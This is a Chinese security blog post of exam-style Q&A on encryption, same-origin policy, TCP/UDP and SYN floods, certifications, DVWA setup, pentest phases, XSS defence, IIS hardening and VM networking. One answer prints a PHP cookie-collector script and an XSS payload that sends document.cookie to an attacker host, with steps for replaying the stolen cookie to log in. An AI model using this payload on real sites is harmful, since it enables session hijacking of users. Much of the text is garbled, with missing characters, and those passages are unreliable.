雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
点击查看-X黑手网
点击查看-X黑手网

网络安全、web安全、渗透测试之笔试总结(二)

本章主要涉及一下几个方面:
对称加密非对称加密?
什么是同源策略?
cookie 存在哪里?可以打开吗
xss 如何盗取 cookie
tcpudp 的区别及 tcp 三次握手,syn 攻击?
证书要考哪些?
DVWA 是如何搭建的?
渗透测试的流程是什么
xss 如何防御
IIS 服务器应该做哪些方面的保护措施:
虚拟机的几种连接方式及原理
xss cookie 一定可以无用户名密码登录吗?
对称加密 非对称加密?
对称加密:加解密用同一密钥,密钥维护复杂 nn-1/2,不适合互联网传输
密钥,加解密效率高。应用于加密数据。
非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就可以,适合于互

网传输公钥,但是加密效率低,应用于数字签名及加密。
什么是同源策略?
为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收到的

容进行隔离。
浏览器不允许任何旧有脚本访问一个站点的 cookie,否则,会话容易被劫持。
只有发布 cookie 的站点能够访问这些 cookie,只有通过该站点返回的页面所

含或加载的 JavaScript 才能访问 cookie
cookie 存在哪里?可以打开吗
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies
工具文件夹选项查看将隐藏被保护的文件的对勾去掉就会看到 cookies
件夹。
xss 如何盗取 cookie
攻击者代码:

<?php
.
.
$cookie=$_GET['cookie'];
.
.
$time=date('Y-m-d g:i:s');
.
.
$referer=getenv('HTTP_REFERER');
.
.
$cookietxt=fopen('cookie.txt','a');
.
.
fwrite($cookietxt,"time:".$time." cookie:".$cookie."
referer:".$referer.""); 注意双引号,容易出错
.
.
fclose($cookietxt);
.
.
?>
.

脚本端:

<script>
.
.
document.write('<img
src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0
border=0 />');
.
.
</script>

.获取到 cookie 后,用 firebug 找到 cookie,新建 cookie
加入 cookie,用 referer 来提交,无需输入帐号密码直接登录进去!
tcpudp 的区别及 tcp 三次握手,syn 攻击?
一、tcpudp 区别
TCP 的优点:
可靠,稳定
TCP 的可靠体现在 TCP 在传递数据之前,会有三次握手来建立连接,而且在

据传递时,有确认、窗口、重传、拥塞控制机制,在数据传完后,还会断开连

用来节约系统资源。
TCP 的缺点:
慢,效率低,占用系统资源高,易被攻击
TCP 在传递数据之前,要先建连接,这会消耗时间,而且在数据传递时,确认
机制、重传机制、拥塞控制机制等都会消耗大量的时间,而且要在每台设备上

护所有的传输连接,事实上,每个连接都会占用系统的 CPU、内存等件资
源。
而且, TCP 有确认机制、三次握手机制,这些也导致 TCP 容易被人利

 
 

DOSDDOSCC 等攻击。
UDP 的优点:
TCP 稍安全
UDP TCP 的握手、确认、窗口、重传、拥塞控制等机制,UDP 是一个无
状态的传输协议,所以在传递数据时非常快 TCP 的这些机制,UDP

TCP 被攻击者用的漏洞就要一些。但 UDP 是无法避免攻击的,如:
UDP
Flood 攻击……
UDP 的缺点:不可靠,不稳定
UDP TCP 些可靠的机制,在数据传递时,如络质量不

容易包。
面的优缺点,么:
什么时应该使 TCP
对网讯质量有要的时如:个数据要确无的传递对方,

往往用于一些要可靠的应用, HTTPHTTPSFTP 等传输文件的协议
POPSMTP 件传输的协议
日常生活中,常见使 TCP 协议的应用如下:
浏览器,用的 HTTP
FlashFXP,用的 FTP
Outlook,用的 POPSMTP
Putty,用的 TelnetSSH
QQ 文件传输
…………
什么时应该使 UDP
对网讯质量要不高的时,要讯速度量的,这时就可

使 UDP
如,日常生活中,常见使 UDP 协议的应用如下:
QQ 语音
QQ 视频
TFTP
TCP 握手协议
TCP/IP 协议中,TCP 协议可靠的连接服务,用三次握手建立一个连
接。
一次握手:建立连接时,户端发 syn (syn=j)到服务器,进入
SYN_SEND 状态,等服务器确认
第二次握手:服务器收到 syn 包,必须确认户的 SYNack=j+1),同时

一个 SYN 包(syn=k),
SYN+ACK 包,此时服务器进入 SYN_RECV 状态;

 
 

三次握手:户端收到服务器的 SYN+ACK 包,服务器发确认包
ACK(ack=k+1),此包发
户端服务器进入 ESTABLISHED 状态,完三次握手。
三次握手,户端服务器开数据,在上述过程中,还有一些重要

概念
连接队列:在三次握手协议中,服务器维护一个连接队列,该队列为每个

户端的 SYN 包(syn=j)开一个条目
条目表明服务器收到 SYN 包,并向客户发出确认,在等待客户的确认
包。
这些条目标识的连接在服务器 Syn_RECV 状态
服务器收到户的确认包时,删除条目,服务器进入 ESTABLISHED
backlog 数:表示未连接队列大容
SYN-ACK 重传次数 服务器发 SYNACK 包,如果未收到户确认包,
服务器进行次重传,等时间仍未收到户确认包,
进行第二次重传,如重传次数过系统定的大重传次数,系统将该连接

连接队列删除。注意,每次重传等的时间不一定同。
连接存时间:是指半连接队列条目最长时间,也即服务从收到
SYN
包到确认这个文无效的最长时间,
该时间是所有重传请求包的最长时间总和。有时我们也连接存

Timeout 时间、SYN_RECV 时间。
三、SYN 攻击原理
SYN 攻击 DOS 攻击的一种,它利 TCP 协议,通过发大量的

请求,耗 CPU 内存资源。
SYN 攻击了能影响主机,还可以危害路由器、防火墙等网系统,事实上
SYN 攻击管目标是什么系统,
只要这些系统打开 TCP 服务就可以施。从上图可看到,服务器接收到连接

syn=j),
将此信息加入连接队列送请求给客户(syn=k,ack=j+1),此时进入
SYN_RECV 状态
服务器收到户端的确认包时,重发请求包,一直到时,才将此条目

连接队列删除
IP 欺骗SYN 攻击能很好的效,通户端在时间内伪造

不存在的 IP 地址
服务器不断 syn 包,服务器回复确认包,待客户的确认,于源
地址是不存在的,

 
 

服务器需要不断的重发直至超时,这些伪造 SYN 包将时间占用连接

正常 SYN 请求丢弃
目标系统慢,重者引络堵甚至系统瘫痪
证书要考哪些?
信息安全国际第一认证——CISSP
信息安全国内认证——CISAW
信息安全国内认证——CISP
信息安全技术实操认证新——Security+
IT 审计人员必备之证——CISA
DVWA 是如何搭建的?
启动 xamppXAMPPApache+MySQL+PHP+PERL)是一个大的建

集成软件包。)下的 apache 中间件 mysql
dvwa xampp 下的 htdocs 录下
在浏览器输入 http://127.0.0.1/dvwa 使
还有 owasp 漏洞练习平台
https://sourceforge.net/projects/owaspbwa/files/
渗透测试的流程是什么
渗透测试流程概述
交互阶段情报搜集阶段威胁模阶段漏洞分析阶段
渗透攻击阶段Exploitation)、后渗透攻击阶段么一直控制,维持访问)
报告阶段
攻击前:网络踩点、网络扫描、网查点
攻击中:漏洞信息进行渗透攻击、获取权限
攻击后:后渗透维持攻击、文件拷贝木马植入、痕迹擦除
xss 如何防御 1.对前端输入做过滤和编码:
如只允许输入类型的字话号式,注用户名制等,输入

查需要在服务器端完,在前端完制是容易过的
特殊进行过滤和转义;
2.对输出做过滤和编码:在输出到前端的 HTML 时进行和转义;
3.给关键 cookie 使 http-only
IIS 服务器应该做哪些方面的保护措施:
理来源:http://www.williamlong.info/archives/118.html
1. 保持 Windows 升级:
2. 使 IIS 工具
3. 移除 Web 站点
4. 果你并不需要 FTP SMTP 服务,请卸它们
5. 地检员组和服务:
6. 严格控制服务器的访问权限
7. 设置复杂的密码
8. 减少/排除 Web 服务器共享

 
 

9. TCP/IP 协议中的 NetBIOS:
10. 使 TCP 端口
11. 仔细检*.bat *.exe 文件: 周搜索一次*.bat
12. IIS 安全:
13. 使 NTFS 安全:
14. 理用户
15. 审计你 Web 服务器:
虚拟机的几种连接方式及原理
安装完虚拟机后,安装个虚拟网VMnet1 VMnet8其他

当然也可以手动安装其他的)。 VMnet1 host
用于 host 方式连接网的。VMnet8 NAT ,用于 NAT 方式连接网
的。
它们 IP 地址生成的,如要用虚拟机做实验的话,
最好 VMnet1 VMnet8 IP 地址改掉。习惯上把 VMware 虚拟网卡使
用的
使用如下原则:VMnet1 对应的网 192.168.10.0VMnet2
应的网 192.168.20.0其他类似当然平常只是随便用用的就
不用了,能网就行了。
VMware 连接的方式主要有:接(Bridged)、NAT、主机网Host-
Only)。
1. Use bridged networking使接网
说明使 VMnet0 虚拟交机,此时虚拟机相当与络上的一

主机一,拥有一个立的 IP 地址
拓扑 1 使接方式,AA1A2B 可互访。

image


2. Use network addresstranslationNAT
说明使 Vmnet8 虚拟交机,此时虚拟机可以通过主机络上其他

 
 

站,其他站不能访问虚拟机。拓扑 2 使 NAT 方式A1A2 可以访问 B,但 B 不可以访
A1A2。但 AA1A2 可以互访。

image


3. Use Host-Only networking使用主机网
说明使 Vmnet1 虚拟交机,此时虚拟机只能虚拟机、主机互访。

不能 Internet拓扑 3
使 Host 方式,AA1A2 可以互访,但 A1A2 不能访问 B不能被
B 访

image


xss cookie 一定可以无用户名密码登录吗?

 
 
本可以。 cookie 值给浏览器,浏览器去访问页面会用有的
cookie
© 版权声明
THE END
喜欢就支持一下吧
点赞15赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容